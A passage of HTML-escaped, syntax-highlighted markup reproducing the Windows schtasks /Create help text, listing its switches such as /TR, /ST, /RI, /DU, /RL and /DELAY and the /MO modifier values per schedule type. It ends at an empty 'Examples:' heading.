    &lt;span class="na"&gt;/M    &lt;/span&gt;&lt;span class="kd"&gt;months&lt;/span&gt;        &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;s&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;year&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="kd"&gt;day&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;month&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;JAN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FEB&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MAR&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;APR&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;MAY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;JUN&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;JUL&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;AUG&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SEP&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;OCT&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;NOV&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;DEC&lt;/span&gt;. &lt;span class="kd"&gt;Wildcard&lt;/span&gt; &lt;span class="s2"&gt;"*"&lt;/span&gt; &lt;span class="kd"&gt;specifies&lt;/span&gt; &lt;span class="kd"&gt;all&lt;/span&gt; &lt;span class="kd"&gt;months&lt;/span&gt;.
    &lt;span class="na"&gt;/I    &lt;/span&gt;&lt;span class="kd"&gt;idletime&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;amount&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;idle&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;wait&lt;/span&gt; &lt;span class="kd"&gt;before&lt;/span&gt; &lt;span class="kd"&gt;running&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;range&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;999&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="na"&gt;/TN   &lt;/span&gt;&lt;span class="kd"&gt;taskname&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt; &lt;span class="kd"&gt;that&lt;/span&gt; &lt;span class="kd"&gt;uniquely&lt;/span&gt; &lt;span class="kd"&gt;identifies&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;.
    &lt;span class="na"&gt;/TR   &lt;/span&gt;&lt;span class="kd"&gt;taskrun&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;path&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;file&lt;/span&gt; &lt;span class="kd"&gt;name&lt;/span&gt; &lt;span class="kd"&gt;of&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;programme&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="nb"&gt;at&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;scheduled&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt;. &lt;span class="kd"&gt;Example&lt;/span&gt;: &lt;span class="kd"&gt;C&lt;/span&gt;:\windows\system32\calc.exe
    &lt;span class="na"&gt;/ST   &lt;/span&gt;&lt;span class="kd"&gt;starttime&lt;/span&gt;     &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="m"&gt;24&lt;/span&gt;‑hour&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="kd"&gt;e&lt;/span&gt;.g. &lt;span class="m"&gt;14&lt;/span&gt;:30 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;:30 &lt;span class="kd"&gt;PM&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;current&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;. &lt;span class="kd"&gt;Required&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="na"&gt;/SC &lt;/span&gt;&lt;span class="kd"&gt;ONCE&lt;/span&gt;.
    &lt;span class="na"&gt;/RI   &lt;/span&gt;&lt;span class="kd"&gt;interval&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;repetition&lt;/span&gt; &lt;span class="kd"&gt;interval&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt;: &lt;span class="kd"&gt;MINUTE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;HOURLY&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;range&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt;–599940 &lt;span class="kd"&gt;minutes&lt;/span&gt;. &lt;span class="kd"&gt;If&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/DU &lt;/span&gt;&lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="na"&gt;/ET   &lt;/span&gt;&lt;span class="kd"&gt;endtime&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;e&lt;/span&gt;.g. &lt;span class="m"&gt;14&lt;/span&gt;:50 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;:50 &lt;span class="kd"&gt;PM&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/DU   &lt;/span&gt;&lt;span class="kd"&gt;duration&lt;/span&gt;      &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;HH&lt;/span&gt;&lt;span class="nl"&gt;:mm&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;For&lt;/span&gt; &lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;tasks&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="na"&gt;/RI &lt;/span&gt;&lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt; &lt;span class="kd"&gt;defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;hour&lt;/span&gt;.
    &lt;span class="na"&gt;/K                  &lt;/span&gt;&lt;span class="kd"&gt;Terminates&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="nb"&gt;at&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;end&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;duration&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;. &lt;span class="kd"&gt;Must&lt;/span&gt; &lt;span class="kd"&gt;specify&lt;/span&gt; &lt;span class="na"&gt;/ET &lt;/span&gt;&lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/DU&lt;/span&gt;.
    &lt;span class="na"&gt;/SD   &lt;/span&gt;&lt;span class="kd"&gt;startdate&lt;/span&gt;     &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;first&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt; &lt;span class="kd"&gt;which&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;Format&lt;/span&gt; &lt;span class="kd"&gt;yyyy&lt;/span&gt;&lt;span class="na"&gt;/mm/dd&lt;/span&gt;. &lt;span class="kd"&gt;Defaults&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;current&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    &lt;span class="na"&gt;/ED   &lt;/span&gt;&lt;span class="kd"&gt;enddate&lt;/span&gt;       &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;last&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt;. &lt;span class="kd"&gt;Format&lt;/span&gt; &lt;span class="kd"&gt;yyyy&lt;/span&gt;&lt;span class="na"&gt;/mm/dd&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;applicable&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;ONCE&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;.
    &lt;span class="na"&gt;/EC   &lt;/span&gt;&lt;span class="kd"&gt;ChannelName&lt;/span&gt;   &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="kd"&gt;channel&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;OnEvent&lt;/span&gt; &lt;span class="kd"&gt;triggers&lt;/span&gt;.
    &lt;span class="na"&gt;/IT                &lt;/span&gt;&lt;span class="kd"&gt;Allows&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;interactively&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;currently&lt;/span&gt; &lt;span class="kd"&gt;logged&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt;. &lt;span class="kd"&gt;This&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="kd"&gt;when&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;logged&lt;/span&gt; &lt;span class="na"&gt;on&lt;/span&gt;.
    &lt;span class="na"&gt;/NP                &lt;/span&gt;&lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;password&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;stored&lt;/span&gt;. &lt;span class="kd"&gt;The&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;runs&lt;/span&gt; &lt;span class="kd"&gt;non&lt;/span&gt;‑interactively &lt;span class="kd"&gt;as&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;given&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;. &lt;span class="kd"&gt;Only&lt;/span&gt; &lt;span class="kd"&gt;local&lt;/span&gt; &lt;span class="kd"&gt;resources&lt;/span&gt; &lt;span class="kd"&gt;are&lt;/span&gt; &lt;span class="kd"&gt;available&lt;/span&gt;.
    &lt;span class="na"&gt;/Z                 &lt;/span&gt;&lt;span class="kd"&gt;Marks&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;deletion&lt;/span&gt; &lt;span class="kd"&gt;after&lt;/span&gt; &lt;span class="kd"&gt;its&lt;/span&gt; &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt;.
    &lt;span class="na"&gt;/XML  &lt;/span&gt;&lt;span class="kd"&gt;xmlfile&lt;/span&gt;       &lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;from&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;XML&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;file&lt;/span&gt;. &lt;span class="kd"&gt;Can&lt;/span&gt; &lt;span class="kd"&gt;be&lt;/span&gt; &lt;span class="kd"&gt;combined&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/RU &lt;/span&gt;&lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;switches&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="na"&gt;/RP &lt;/span&gt;&lt;span class="kd"&gt;alone&lt;/span&gt; &lt;span class="kd"&gt;when&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;XML&lt;/span&gt; &lt;span class="kd"&gt;already&lt;/span&gt; &lt;span class="kd"&gt;contains&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;principal&lt;/span&gt;.
    &lt;span class="na"&gt;/V&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;                &lt;span class="kd"&gt;Creates&lt;/span&gt; &lt;span class="kd"&gt;a&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;visible&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;pre&lt;/span&gt;‑Vista &lt;span class="kd"&gt;platforms&lt;/span&gt;. &lt;span class="kd"&gt;Not&lt;/span&gt; &lt;span class="kd"&gt;compatible&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="na"&gt;/XML&lt;/span&gt;.
    &lt;span class="na"&gt;/F                 &lt;/span&gt;&lt;span class="kd"&gt;Forcefully&lt;/span&gt; &lt;span class="kd"&gt;creates&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;suppresses&lt;/span&gt; &lt;span class="kd"&gt;warnings&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;specified&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;already&lt;/span&gt; &lt;span class="kd"&gt;exists&lt;/span&gt;.
    &lt;span class="na"&gt;/RL   &lt;/span&gt;&lt;span class="kd"&gt;level&lt;/span&gt;        &lt;span class="kd"&gt;Sets&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="nb"&gt;run&lt;/span&gt; &lt;span class="kd"&gt;level&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;job&lt;/span&gt;. &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt;: &lt;span class="kd"&gt;LIMITED&lt;/span&gt; &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;HIGHEST&lt;/span&gt;. &lt;span class="kd"&gt;Default&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;LIMITED&lt;/span&gt;.
    &lt;span class="na"&gt;/DELAY &lt;/span&gt;&lt;span class="kd"&gt;delaytime&lt;/span&gt;   &lt;span class="kd"&gt;Specifies&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;wait&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="kd"&gt;delay&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;task&lt;/span&gt; &lt;span class="kd"&gt;after&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="kd"&gt;trigger&lt;/span&gt; &lt;span class="kd"&gt;fires&lt;/span&gt;. &lt;span class="kd"&gt;Time&lt;/span&gt; &lt;span class="nb"&gt;format&lt;/span&gt; &lt;span class="kd"&gt;mmmm&lt;/span&gt;&lt;span class="nl"&gt;:ss&lt;/span&gt;. &lt;span class="kd"&gt;This&lt;/span&gt; &lt;span class="kd"&gt;option&lt;/span&gt; &lt;span class="kd"&gt;is&lt;/span&gt; &lt;span class="kd"&gt;only&lt;/span&gt; &lt;span class="kd"&gt;valid&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="kd"&gt;types&lt;/span&gt; &lt;span class="kd"&gt;ONSTART&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;.
    /&lt;span class="o"&gt;?&lt;/span&gt;                 &lt;span class="kd"&gt;Displays&lt;/span&gt; &lt;span class="kd"&gt;this&lt;/span&gt; &lt;span class="nb"&gt;help&lt;/span&gt; &lt;span class="kd"&gt;message&lt;/span&gt;.

&lt;span class="kd"&gt;Modifiers&lt;/span&gt;: &lt;span class="kd"&gt;Valid&lt;/span&gt; &lt;span class="kd"&gt;values&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="kd"&gt;the&lt;/span&gt; &lt;span class="na"&gt;/MO &lt;/span&gt;&lt;span class="kd"&gt;switch&lt;/span&gt; &lt;span class="kd"&gt;per&lt;/span&gt; &lt;span class="kd"&gt;schedule&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;:
    &lt;span class="kd"&gt;MINUTE&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;1439&lt;/span&gt; &lt;span class="kd"&gt;minutes&lt;/span&gt;.
    &lt;span class="kd"&gt;HOURLY&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; – &lt;span class="m"&gt;23&lt;/span&gt; &lt;span class="kd"&gt;hours&lt;/span&gt;.
    &lt;span class="kd"&gt;DAILY&lt;/span&gt;:   &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;365&lt;/span&gt; &lt;span class="kd"&gt;days&lt;/span&gt;.
    &lt;span class="kd"&gt;WEEKLY&lt;/span&gt;:  &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;52&lt;/span&gt; &lt;span class="kd"&gt;weeks&lt;/span&gt;.
    &lt;span class="kd"&gt;ONCE&lt;/span&gt;:    &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONSTART&lt;/span&gt;: &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONLOGON&lt;/span&gt;: &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;ONIDLE&lt;/span&gt;:  &lt;span class="kd"&gt;No&lt;/span&gt; &lt;span class="kd"&gt;modifier&lt;/span&gt;.
    &lt;span class="kd"&gt;MONTHLY&lt;/span&gt;: &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="kd"&gt;to&lt;/span&gt; &lt;span class="m"&gt;12&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;or&lt;/span&gt; &lt;span class="kd"&gt;FIRST&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;SECOND&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;THIRD&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;FOURTH&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;LAST&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;LASTDAY&lt;/span&gt;.
    &lt;span class="kd"&gt;ONEVENT&lt;/span&gt;: &lt;span class="kd"&gt;XPath&lt;/span&gt; &lt;span class="kd"&gt;event&lt;/span&gt; &lt;span class="nb"&gt;query&lt;/span&gt; &lt;span class="kd"&gt;string&lt;/span&gt;.

&lt;span class="kd"&gt;Examples&lt;/span&gt;:
